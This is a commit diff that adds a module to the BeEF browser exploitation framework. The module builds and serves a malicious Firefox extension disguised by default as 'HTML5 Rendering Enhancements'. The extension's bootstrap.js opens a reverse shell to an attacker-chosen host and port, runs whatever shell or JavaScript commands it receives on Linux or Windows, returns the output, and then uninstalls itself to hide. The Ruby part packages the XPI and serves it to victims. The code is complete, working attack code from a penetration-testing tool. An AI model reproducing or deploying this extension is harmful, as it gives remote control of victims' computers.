Add malicious FF extension (reverse shell) module
This commit is contained in:
bcoles
File diff suppressed because one or more lines are too long
@@ -0,0 +1,16 @@
|
||||
#
|
||||
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
firefox_extension_reverse_shell:
|
||||
enable: true
|
||||
category: ["Exploits", "Local Host"]
|
||||
name: "Firefox Extension (Reverse Shell)"
|
||||
description: "Create on the fly a malicious Firefox extension that makes a reverse shell connection to a specified host:port.<br/><br/>The extension is based on the original work from Michael Schierl and his Metasploit module, and joev's Firefox payloads for Metasploit."
|
||||
authors: ["antisnatchor", "bcoles"]
|
||||
target:
|
||||
user_notify: ["FF"]
|
||||
not_working: ["All"]
|
||||
Binary file not shown.
181
modules/exploits/local_host/firefox_extension_reverse_shell/extension/bootstrap.js
vendored
Normal file
181
modules/exploits/local_host/firefox_extension_reverse_shell/extension/bootstrap.js
vendored
Normal file
@@ -0,0 +1,181 @@
|
||||
|
||||
function startup(data, reason) {
|
||||
var file = Components.classes["@mozilla.org/file/directory_service;1"].
|
||||
getService(Components.interfaces.nsIProperties).
|
||||
get("ProfD", Components.interfaces.nsIFile);
|
||||
file.append("extensions");
|
||||
xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";
|
||||
file.append(xpi_guid);
|
||||
|
||||
// # ./msfpayload firefox/shell_reverse_tcp
|
||||
(function(){
|
||||
Components.utils.import("resource://gre/modules/NetUtil.jsm");
|
||||
var host = '__reverse_shell_host_placeholder__';
|
||||
var port = __reverse_shell_port_placeholder__;
|
||||
|
||||
var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"]
|
||||
.getService(Components.interfaces.nsISocketTransportService);
|
||||
var socket = socketTransport.createTransport(null, 0, host, port, null);
|
||||
var outStream = socket.openOutputStream(0, 0, 0);
|
||||
var inStream = socket.openInputStream(0, 0, 0);
|
||||
|
||||
var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
|
||||
.createInstance(Components.interfaces.nsIInputStreamPump);
|
||||
pump.init(inStream, -1, -1, 0, 0, true);
|
||||
|
||||
var listener = {
|
||||
onStartRequest: function(request, context) {},
|
||||
onStopRequest: function(request, context) {},
|
||||
onDataAvailable: function(request, context, stream, offset, count) {
|
||||
var data = NetUtil.readInputStreamToString(stream, count).trim();
|
||||
runCmd(data, function(err, output) {
|
||||
if (!err) outStream.write(output, output.length);
|
||||
});
|
||||
}
|
||||
};
|
||||
|
||||
var readFile = function(path) {
|
||||
try {
|
||||
var file = Components.classes["@mozilla.org/file/local;1"]
|
||||
.createInstance(Components.interfaces.nsILocalFile);
|
||||
file.initWithPath(path);
|
||||
|
||||
var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
|
||||
.createInstance(Components.interfaces.nsIFileInputStream);
|
||||
fileStream.init(file, 1, 0, false);
|
||||
|
||||
var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
|
||||
.createInstance(Components.interfaces.nsIBinaryInputStream);
|
||||
binaryStream.setInputStream(fileStream);
|
||||
var array = binaryStream.readByteArray(fileStream.available());
|
||||
|
||||
binaryStream.close();
|
||||
fileStream.close();
|
||||
file.remove(true);
|
||||
|
||||
return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
|
||||
} catch (e) { return ""; }
|
||||
};
|
||||
|
||||
|
||||
var setTimeout = function(cb, delay) {
|
||||
var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
|
||||
timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
|
||||
return timer;
|
||||
};
|
||||
|
||||
|
||||
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
|
||||
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
|
||||
var windows = (ua.indexOf("Windows")>-1);
|
||||
var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
|
||||
var jscript = ({"src":"\n var b64 = WScript.arguments(0);\n var dom = new ActiveXObject(\"MSXML2.DOMDocument.3.0\");\n var el = dom.createElement(\"root\");\n el.dataType = \"bin.base64\"; el.text = b64; dom.appendChild(el);\n var stream = new ActiveXObject(\"ADODB.Stream\");\n stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);\n stream.Position=0; stream.type=2; stream.CharSet = \"us-ascii\"; stream.Position=0;\n var cmd = stream.ReadText();\n (new ActiveXObject(\"WScript.Shell\")).Run(cmd, 0, true);\n "}).src;
|
||||
var runCmd = function(cmd, cb) {
|
||||
cb = cb || (function(){});
|
||||
|
||||
if (cmd.trim().length == 0) {
|
||||
setTimeout(function(){ cb("Command is empty string ('')."); });
|
||||
return;
|
||||
}
|
||||
|
||||
var js = (/^\s*\[JAVASCRIPT\]([\s\S]*)\[\/JAVASCRIPT\]/g).exec(cmd.trim());
|
||||
if (js) {
|
||||
var tag = "[!JAVASCRIPT]";
|
||||
var sync = true; // avoid zalgo's reach
|
||||
var sent = false;
|
||||
var retVal = null;
|
||||
|
||||
try {
|
||||
retVal = Function('send', js[1])(function(r){
|
||||
if (sent) return;
|
||||
sent = true
|
||||
if (r) {
|
||||
if (sync) setTimeout(function(){ cb(false, r+tag+"\n"); });
|
||||
else cb(false, r+tag+"\n");
|
||||
}
|
||||
});
|
||||
} catch (e) { retVal = e.message; }
|
||||
|
||||
sync = false;
|
||||
|
||||
if (retVal && !sent) {
|
||||
sent = true;
|
||||
setTimeout(function(){ cb(false, retVal+tag+"\n"); });
|
||||
}
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
var shEsc = "\\$&";
|
||||
var shPath = "/bin/sh -c"
|
||||
|
||||
if (windows) {
|
||||
shPath = "cmd /c";
|
||||
shEsc = "\^$&";
|
||||
var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
|
||||
.getService(Components.interfaces.nsIProperties)
|
||||
.get("TmpD", Components.interfaces.nsIFile);
|
||||
jscriptFile.append('7kZuA4kPoh2HzVagS.js');
|
||||
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
|
||||
.createInstance(Components.interfaces.nsIFileOutputStream);
|
||||
stream.init(jscriptFile, 0x04 | 0x08 | 0x20, 0666, 0);
|
||||
stream.write(jscript, jscript.length);
|
||||
if (stream instanceof Components.interfaces.nsISafeOutputStream) {
|
||||
stream.finish();
|
||||
} else {
|
||||
stream.close();
|
||||
}
|
||||
}
|
||||
|
||||
var stdoutFile = "7tDzOIHbP3vzglqB";
|
||||
|
||||
var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
|
||||
.getService(Components.interfaces.nsIProperties)
|
||||
.get("TmpD", Components.interfaces.nsIFile);
|
||||
stdout.append(stdoutFile);
|
||||
|
||||
if (windows) {
|
||||
var shell = shPath+" "+cmd;
|
||||
shell = shPath+" "+shell.replace(/\W/g, shEsc)+" >"+stdout.path+" 2>&1";
|
||||
var b64 = svcs.btoa(shell);
|
||||
} else {
|
||||
var shell = shPath+" "+cmd.replace(/\W/g, shEsc);
|
||||
shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1";
|
||||
}
|
||||
var process = Components.classes["@mozilla.org/process/util;1"]
|
||||
.createInstance(Components.interfaces.nsIProcess);
|
||||
var sh = Components.classes["@mozilla.org/file/local;1"]
|
||||
.createInstance(Components.interfaces.nsILocalFile);
|
||||
|
||||
if (windows) {
|
||||
sh.initWithPath("C:\\Windows\\System32\\wscript.exe");
|
||||
process.init(sh);
|
||||
var args = [jscriptFile.path, b64];
|
||||
process.run(true, args, args.length);
|
||||
jscriptFile.remove(true);
|
||||
setTimeout(function(){cb(false, cmd+"\n"+readFile(stdout.path));});
|
||||
} else {
|
||||
sh.initWithPath("/bin/sh");
|
||||
process.init(sh);
|
||||
var args = ["-c", shell];
|
||||
process.run(true, args, args.length);
|
||||
setTimeout(function(){cb(false, readFile(stdout.path));});
|
||||
}
|
||||
};
|
||||
|
||||
|
||||
pump.asyncRead(listener, null);
|
||||
})();
|
||||
|
||||
|
||||
|
||||
try { // Fx < 4.0
|
||||
Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
|
||||
} catch (e) {}
|
||||
try { // Fx 4.0 and later
|
||||
Components.utils.import("resource://gre/modules/AddonManager.jsm");
|
||||
AddonManager.getAddonByID(xpi_guid, function(addon) {
|
||||
addon.uninstall();
|
||||
});
|
||||
} catch (e) {}
|
||||
}
|
||||
@@ -0,0 +1 @@
|
||||
This is a temp directory where the Firefox extension will be built.
|
||||
@@ -0,0 +1,2 @@
|
||||
content {861fb387-92ce-bb0a-cb48-4b923dbc292b} ./
|
||||
overlay chrome://browser/content/browser.xul chrome://{861fb387-92ce-bb0a-cb48-4b923dbc292b}/content/overlay.xul
|
||||
@@ -0,0 +1,24 @@
|
||||
<?xml version="1.0"?>
|
||||
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
|
||||
<Description about="urn:mozilla:install-manifest">
|
||||
<em:id>{861fb387-92ce-bb0a-cb48-4b923dbc292b}</em:id>
|
||||
<em:name>__extension_name_placeholder__</em:name>
|
||||
<em:version>1.0</em:version>
|
||||
<em:bootstrap>true</em:bootstrap>
|
||||
<em:unpack>true</em:unpack>
|
||||
<em:targetApplication>
|
||||
<Description>
|
||||
<em:id>toolkit@mozilla.org</em:id>
|
||||
<em:minVersion>1.0</em:minVersion>
|
||||
<em:maxVersion>*</em:maxVersion>
|
||||
</Description>
|
||||
</em:targetApplication>
|
||||
<em:targetApplication>
|
||||
<Description>
|
||||
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
|
||||
<em:minVersion>1.0</em:minVersion>
|
||||
<em:maxVersion>*</em:maxVersion>
|
||||
</Description>
|
||||
</em:targetApplication>
|
||||
</Description>
|
||||
</RDF>
|
||||
@@ -0,0 +1,5 @@
|
||||
<?xml version="1.0"?>
|
||||
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
|
||||
<script src="bootstrap.js"/>
|
||||
<script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
|
||||
</overlay>
|
||||
@@ -0,0 +1,90 @@
|
||||
#
|
||||
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
class Firefox_extension_reverse_shell < BeEF::Core::Command
|
||||
|
||||
class Bind_extension < BeEF::Core::Router::Router
|
||||
before do
|
||||
headers 'Content-Type' => 'application/x-xpinstall',
|
||||
'Pragma' => 'no-cache',
|
||||
'Cache-Control' => 'no-cache',
|
||||
'Expires' => '0'
|
||||
end
|
||||
|
||||
get '/' do
|
||||
response['Content-Type'] = "application/x-xpinstall"
|
||||
extension_path = settings.extension_path
|
||||
print_info "Serving malicious Firefox Extension (Reverse Shell): #{extension_path}"
|
||||
send_file "#{extension_path}",
|
||||
:type => 'application/x-xpinstall',
|
||||
:disposition => 'inline'
|
||||
end
|
||||
end
|
||||
|
||||
def pre_send
|
||||
|
||||
# gets the value configured in the module configuration by the user
|
||||
@datastore.each do |input|
|
||||
if input['name'] == "extension_name"
|
||||
@extension_name = input['value']
|
||||
end
|
||||
if input['name'] == "xpi_name"
|
||||
@xpi_name = input['value']
|
||||
end
|
||||
if input['name'] == "lport"
|
||||
@lport = input['value']
|
||||
end
|
||||
if input['name'] == "lhost"
|
||||
@lhost = input['value']
|
||||
end
|
||||
end
|
||||
|
||||
mod_path = "#{$root_dir}/modules/exploits/local_host/firefox_extension_reverse_shell"
|
||||
extension_path = mod_path + "/extension"
|
||||
|
||||
# clean the build directory
|
||||
FileUtils.rm_rf("#{extension_path}/build/.", secure: true)
|
||||
|
||||
# copy in the build directory necessary file, substituting placeholders
|
||||
File.open(extension_path + "/build/install.rdf", "w") {|file| file.puts File.read(extension_path + "/install.rdf").gsub!("__extension_name_placeholder__", @extension_name)}
|
||||
File.open(extension_path + "/build/bootstrap.js", "w") {|file| file.puts File.read(extension_path + "/bootstrap.js").gsub!("__reverse_shell_port_placeholder__", @lport).gsub!("__reverse_shell_host_placeholder__", @lhost)}
|
||||
File.open(extension_path + "/build/overlay.xul", "w") {|file| file.puts File.read(extension_path + "/overlay.xul")}
|
||||
File.open(extension_path + "/build/chrome.manifest", "w") {|file| file.puts File.read(extension_path + "/chrome.manifest")}
|
||||
|
||||
extension_content = ["install.rdf", "bootstrap.js", "overlay.xul", "chrome.manifest"]
|
||||
|
||||
# create the XPI extension container
|
||||
xpi = "#{extension_path}/#{@xpi_name}.xpi"
|
||||
if File.exist?(xpi)
|
||||
File.delete(xpi)
|
||||
end
|
||||
Zip::File.open(xpi, Zip::File::CREATE) do |xpi|
|
||||
extension_content.each do |filename|
|
||||
xpi.add(filename, "#{extension_path}/build/#{filename}")
|
||||
end
|
||||
end
|
||||
|
||||
# mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specific content-type/disposition)
|
||||
bind_extension = Firefox_extension_reverse_shell::Bind_extension
|
||||
bind_extension.set :extension_path, "#{$root_dir}/modules/exploits/local_host/firefox_extension_reverse_shell/extension/#{@xpi_name}.xpi"
|
||||
BeEF::Core::Server.instance.mount("/#{@xpi_name}.xpi", bind_extension.new)
|
||||
BeEF::Core::Server.instance.remap
|
||||
end
|
||||
|
||||
def self.options
|
||||
@configuration = BeEF::Core::Configuration.instance
|
||||
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
|
||||
return [
|
||||
{'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
|
||||
{'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},
|
||||
{'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '1337'},
|
||||
{'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => "#{beef_host}"}
|
||||
]
|
||||
end
|
||||
|
||||
def post_execute
|
||||
save({'result' => @datastore['result']})
|
||||
end
|
||||
end
|
||||
Reference in New Issue
Block a user